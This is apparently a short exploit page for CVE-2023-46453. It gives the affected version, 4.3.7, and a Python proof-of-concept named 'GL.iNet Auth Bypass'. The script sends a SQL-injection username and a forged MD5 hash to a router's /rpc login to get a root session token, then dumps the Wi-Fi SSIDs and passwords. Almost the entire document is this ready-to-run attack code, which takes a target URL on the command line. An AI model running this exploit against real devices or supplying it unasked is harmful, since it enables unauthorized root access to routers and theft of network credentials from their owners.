CVE-2023-46453

影响版本Version：4.3.7

POC

# CVE: CVE-2023-46453 from urllib.parse import urlparseimport requestsimport hashlibimport randomimport sys def exploit(url): try: requests.packages.urllib3.disable_warnings() host = urlparse(url) url = f"{host.scheme}://{host.netloc}/rpc" print(f"[*] Target: {url}") print("[*] Retrieving nonce...") nonce = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "challenge", "params": {"username": "root"} }, timeout=5).json() if "result" in nonce and "nonce" in nonce["result"]: print(f"[*] Got nonce: {nonce['result']['nonce']} !") else: print("[!] Nonce not found, exiting... :(") sys.exit(1) print("[*] Retrieving authentication token for root...") md5_hash = hashlib.md5() md5_hash.update( f"roo[^'union selecTchar(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode()) password = md5_hash.hexdigest() token = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "login", "params": { "username": f"roo[^'union selecTchar(114,111,111,116)--]:[^:]+:[^:]+", "hash": password } }, timeout=5).json() if "result" in token and "sid" in token["result"]: print(f"[*] Got token: {token['result']['sid']} !") else: print("[!] Token not found, exiting... :(") sys.exit(1) print("[*] Checking if we are root...") check = requests.post(url, verify=False, json={ "jsonrpc": "2.0", "id": random.randint(1000, 9999), "method": "call", "params": [token["result"]["sid"], "system", "get_status", {}] }, timeout=5).json() if "result" in check and "wifi" in check["result"]: print("[*] We are authenticated as root! :)") print("[*] Below some info:") for wifi in check["result"]["wifi"]: print(f"[*] --------------------") print(f"[*] SSID: {wifi['ssid']}") print(f"[*] Password: {wifi['passwd']}") print(f"[*] Band: {wifi['band']}") print(f"[*] --------------------") else: print("[!] Something went wrong, exiting... :(") sys.exit(1) except requests.exceptions.Timeout: print("[!] Timeout error, exiting... :(") sys.exit(1) except KeyboardInterrupt: print(f"[!] Something went wrong: {e}") if __name__ == "__main__": print("GL.iNet Auth Bypass\n") if len(sys.argv) < 2: print( f"Usage: python3 {sys.argv[1]} https://target.com",file=sys.stderr) sys.exit(0) else: exploit(sys.argv[1])